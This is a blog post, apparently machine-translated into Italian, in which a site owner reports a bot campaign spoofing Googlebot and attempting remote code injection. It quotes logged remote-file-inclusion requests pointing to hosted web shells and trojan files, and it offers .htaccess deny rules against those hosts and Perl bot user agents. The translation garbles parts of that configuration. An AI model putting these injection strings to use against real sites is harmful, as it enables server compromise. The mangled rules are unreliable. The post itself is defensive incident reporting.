Per questo passato tre giorni in questo blog è la sofferenza attacco DOS. L'attacco è ancora vivo oggi non credo che lascerà ancora. I cant vietato questo bot direttamente come erano invio fucina pacchetto (packet spoofing) come googlebot http://www.whois-search.com/whois/64.233.166.136. Im ancora cercando il giusto provider di servizi Internet.
OrgName: Google Inc. OrgID: GOGL Indirizzo: 1600 Amphitheatre Parkway Località: Mountain View StateProv: CA PostalCode: 94043 Paese: Stati Uniti
Al momento ho bloccato tutti i flussi di distanza dalla loro casuale ospitante *. com e "perl bot firma", ma il blocco non si ferma li martellare da questo sito. Sarò l'invio di 503 (Servizio non disponibile), su richiesta, in modo certo se si hanno problemi di accesso di questo sito si prega di controllare più tardi.
Tipo di iniezioni
Vi è molto parametro uri nel mio log (i log del server per disabili - limite di risorse) che probabilmente ha un ampio inventario di check-list di noti CMS vulnerabilità. Posso solo confermare che la sua uno blackhat seo spam bot come richiesta uri comprendere il tipico order.php pagina.
/ es / wordpress / how-to-rimosso-wordpress-net-in-spam-iniezione-infetti-by-mike-ja gger-goro-class-mailphp/order.php /? wp = http://hom3.t35.com/xpl/hack/id.txt? / es / wordpress / order.php /? wp = http://hom3.t35.com/xpl/hack/id.txt? / order.php? wp = http://hom3.t35.com/xpl/hack/id.txt?
Per visualizzare le seguenti fonte è necessario escludere il sito ospitante dal tuo programma antivirus.
- Perl / ShellBot.B trojan - http://hom3.t35.com/xpl/fidz/hack/bnc.txt
- PHP / Rst.S Trojan - http://hom3.t35.com/xpl/fidz
htaccess Codice Iniettore bloccato cattivo e Perl Bot (botnet)
Se ha problemi simili. si dovrebbe bloccare la seguente dominio nel tuo htaccess.
mod_setenvifSetEnvIfNoCase Referer "^ http:// (www.)? T35 \. Com" codeinjector_ref = 1 SetEnvIfNoCase Referer "^ http:// (www.)? Jorgevolio \. Com" codeinjector_ref = 1 SetEnvIfNoCase Referer "^ http:// (www.)? Emabe \. Com" codeinjector_ref = 1 SetEnvIfNoCase Referer "^ http:// (www.)? Pawang \. Nella" codeinjector_ref = 1 SetEnvIfNoCase Referer "^ http:// (www.)? Gw-oro \. Net" codeinjector_ref = 1 SetEnvIfNoCase User-Agent "^ LibWWW-perl *" shell_bots = 1 SetEnvIfNoCase User-Agent "^ Amidalla *" shell_bots = 1 <FilesMatch "(.*)"> Ordine Consenti, Nega Lasciare da tutti Nega da env = codeinjector_ref Nega da env = shell_bots </ FilesMatch>
se u arent certo se avete server mod_setenvif avvolge come l'esempio qui di seguito.
<IfModule Mod_setenvif.c> # ... sostituire questa riga con il codice sopra ... </ IfModule>
Come trappola Perl Shell Bot
Abbiamo bisogno di un modello di trappola questo bot. certamente si sapeva che questi bot:
- non fa onore robot.txt
- che la scansione di tutti sottodirectory
- che è un modello URI richiesta
Per ora ho solo creare sottodirectory per auto-divieto (e alcune altre cose) in base al loro modello. Alexa bot saranno vietate anche in quanto dont robot.txt onore.
I'll be aggiornamento questo post di tanto in tanto. Non cercare gli articoli su come pacchetto spoofing e convalidare fucina / spoof pacchetto.
Recenti Scan & Aggiornamento
Il seguente elenco viene automaticamente aggiunto.
- 24 dicembre 2007
- IP: 64.26.63.10 param: login =? iniettare: http://pawang.in/r57.txt
- 24 dicembre 2007
- IP: 64.26.63.10 param: dir =, login = iniettare: http://pawang.in/r57.txt?
- 25 dicembre 2007
- IP: 59.158.128.138 param: p =,: = allinurl iniettare: http://gw-gold.net/jpg/pictures/test.txt
Risorse esterne
- Dicembre 21, 2007 at 10:48 pm
- Febbraio 16, 2008 at 3:05 am
- 0,3
- url
No Responses to "Messa di iniezione di codice in modalità remota in quanto Googlebot - Packet Spoofing Perl e bot Trojan"
Trackback URL: Usa la TrackBack url ↑ a ping questo articolo. Se il tuo blog non supporta Trackbacks si potrebbe desiderare di lasciare un commento, invece.
"scrivere come se si trattasse di parlare con un buon amico (di fronte a tua madre)."
. esprimere la tua opinione
Disclaimer: Per qualsiasi contenuto che si posta, l'utente concede a Kakkoi il titolo gratuito, irrevocabile, perpetuo, esclusivo e pienamente sublicensable licenza di utilizzare, riprodurre, modificare, adattare, pubblicare, tradurre, creare opere derivate, distribuire, eseguire e visualizzare tali contenuti in tutto o in parte, in tutto il mondo e di incorporare in altri lavori, in qualsiasi forma, media o tecnologia attualmente conosciuta o sviluppata. Alcuni diritti riservati.
La seguente "Codice" sono concepite per proteggere voi e gli altri utenti di questo sito.
Al fine di mantenere queste esperienze piacevole e interessante per tutti i nostri utenti, ti chiediamo di seguire le linee guida di cui sopra.
essere il primo a commentare.